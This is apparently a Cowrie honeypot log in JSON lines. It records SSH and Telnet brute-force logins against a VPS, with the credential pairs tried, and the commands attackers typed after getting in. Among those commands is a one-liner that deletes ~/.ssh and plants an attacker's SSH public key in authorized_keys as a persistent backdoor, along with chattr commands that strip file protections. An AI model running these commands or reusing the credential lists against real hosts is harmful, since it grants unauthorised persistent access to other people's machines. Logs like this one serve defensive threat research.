{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:08.970406Z","src_ip":"118.26.39.178","session":"a2f0ef8fca7b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:36:10.005793Z","src_ip":"118.26.39.178","session":"a2f0ef8fca7b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:10.266293Z","src_ip":"118.26.39.178","session":"c283b8e63db9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:10.268345Z","src_ip":"118.26.39.178","session":"a2f0ef8fca7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51394,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bfefeb9fcc2","protocol":"ssh","message":"New connection: 212.227.235.229:51394 (1.2.3.4:22) [session: 0bfefeb9fcc2]","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.339476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.340848Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.449729Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"987e5cc0cffc","protocol":"ssh","message":"New connection: 157.20.207.165:53380 (1.2.3.4:22) [session: 987e5cc0cffc]","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.682970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.683926Z","src_ip":"157.20.207.165","session":"987e5cc0cffc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.867351Z","src_ip":"157.20.207.165","session":"987e5cc0cffc"}
{"eventid":"cowrie.login.success","username":"root","password":"admin#123","message":"login attempt [root/admin#123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:36:17.897508Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:36:18.175071Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.175741Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.176805Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.289062Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:36:18.525724Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.526492Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.login.failed","username":"node","password":"node123","message":"login attempt [node/node123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.606794Z","src_ip":"157.20.207.165","session":"987e5cc0cffc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.638507Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.639414Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60790,"dst_ip":"1.2.3.4","dst_port":22,"session":"33a86fd0b8c4","protocol":"ssh","message":"New connection: 212.227.235.229:60790 (1.2.3.4:22) [session: 33a86fd0b8c4]","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.749126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.751789Z","src_ip":"212.227.235.229","session":"33a86fd0b8c4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:18.861229Z","src_ip":"212.227.235.229","session":"33a86fd0b8c4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:36:19.303921Z","src_ip":"212.227.235.229","session":"33a86fd0b8c4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:19.792264Z","src_ip":"157.20.207.165","session":"987e5cc0cffc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:20.418366Z","src_ip":"212.227.235.229","session":"33a86fd0b8c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63991,"dst_ip":"1.2.3.4","dst_port":22,"session":"6afcdf55c75d","protocol":"ssh","message":"New connection: 212.227.235.229:63991 (1.2.3.4:22) [session: 6afcdf55c75d]","sensor":"my-vps","timestamp":"2025-09-09T06:36:20.528244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:36:20.534873Z","src_ip":"212.227.235.229","session":"6afcdf55c75d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:36:20.645453Z","src_ip":"212.227.235.229","session":"6afcdf55c75d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:36:21.122313Z","src_ip":"212.227.235.229","session":"6afcdf55c75d"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:21.233871Z","src_ip":"212.227.235.229","session":"0bfefeb9fcc2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:36:21.234940Z","src_ip":"212.227.235.229","session":"6afcdf55c75d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60602,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7382494bbee","protocol":"telnet","message":"New connection: 212.227.235.229:60602 (1.2.3.4:23) [session: c7382494bbee]","sensor":"my-vps","timestamp":"2025-09-09T06:36:37.029858Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:36:37.232910Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:36:37.284981Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T06:36:37.286046Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T06:36:37.286771Z","src_ip":"212.227.235.229","session":"c7382494bbee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47850,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6b4c747129","protocol":"ssh","message":"New connection: 212.227.235.229:47850 (1.2.3.4:22) [session: cb6b4c747129]","sensor":"my-vps","timestamp":"2025-09-09T06:37:19.152576Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61665,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e98081aa4f8","protocol":"ssh","message":"New connection: 212.227.235.229:61665 (1.2.3.4:22) [session: 0e98081aa4f8]","sensor":"my-vps","timestamp":"2025-09-09T06:37:19.315081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:19.315844Z","src_ip":"212.227.235.229","session":"0e98081aa4f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:19.442063Z","src_ip":"212.227.235.229","session":"0e98081aa4f8"}
{"eventid":"cowrie.login.failed","username":"hbase","password":"Password123","message":"login attempt [hbase/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:37:19.925224Z","src_ip":"212.227.235.229","session":"0e98081aa4f8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:20.262477Z","src_ip":"212.227.235.229","session":"cb6b4c747129"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:20.263181Z","src_ip":"212.227.235.229","session":"cb6b4c747129"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:21.036887Z","src_ip":"212.227.235.229","session":"0e98081aa4f8"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:37:21.238769Z","src_ip":"212.227.235.229","session":"cb6b4c747129"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:22.483821Z","src_ip":"212.227.235.229","session":"cb6b4c747129"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":45646,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d95f0964e3e","protocol":"ssh","message":"New connection: 157.20.207.165:45646 (1.2.3.4:22) [session: 3d95f0964e3e]","sensor":"my-vps","timestamp":"2025-09-09T06:37:26.169211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:26.169886Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:26.352783Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678a","message":"login attempt [root/12345678a] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:37:27.128168Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:37:27.509866Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:37:27.510578Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:37:27.511591Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:27.695225Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:37:28.162524Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
